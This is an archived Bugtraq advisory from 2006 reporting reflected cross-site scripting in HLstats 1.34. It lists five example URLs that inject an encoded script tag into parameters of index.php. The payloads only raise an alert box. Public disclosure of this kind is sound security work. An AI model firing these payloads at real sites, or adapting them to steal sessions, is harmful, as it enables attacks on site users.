[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

XSS in HLstats 1.34

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XSS in HLstats 1.34
From: "MC Iglo" <mc.iglo@xxxxxxxxxxxxxx>
Date: Wed, 30 Aug 2006 09:52:25 +0200

Hello, world ;)

Input passed to multiple parameters in index.php isn't properly
sanitised before being returned to the user. This can be exploited to
execute HTML and script code in a user's browser session in context of
an affected site with limitation of ' and ".
This may also affect prior versions.

Examples:
http://[host]/index.php?mode=players&game=%3Cscript%3Ealert(123)%3C/script%3E
http://[host]/index.php?mode=weaponinfo&weapon=%3Cscript%3Ealert(123)%3C/script%3E&game=tfc
http://[host]/index.php?mode=search&q=whatever&st=%3Cscript%3Ealert(123)%3C/script%3E&game=tfc
http://[host]/index.php?mode=actioninfo&action=%3Cscript%3Ealert(123)%3C/script%3E&game=tfc
http://[host]/index.php?mode=mapinfo&map=%3Cscript%3Ealert(123)%3C/script%3E&game=tfc

(instead of 'tfc' you should use the game, HLstats is configurated for)

kind regards
MC.Iglo

Prev by Date: Nuked Klan 1.7 SP4.3 : Function Anti-XSS Bypassed
Next by Date: [KAPDA::#56] - FREEKOT SQL Injection Vulnerability
Previous by thread: Nuked Klan 1.7 SP4.3 : Function Anti-XSS Bypassed
Next by thread: [KAPDA::#56] - FREEKOT SQL Injection Vulnerability
Index(es):
- Date
- Thread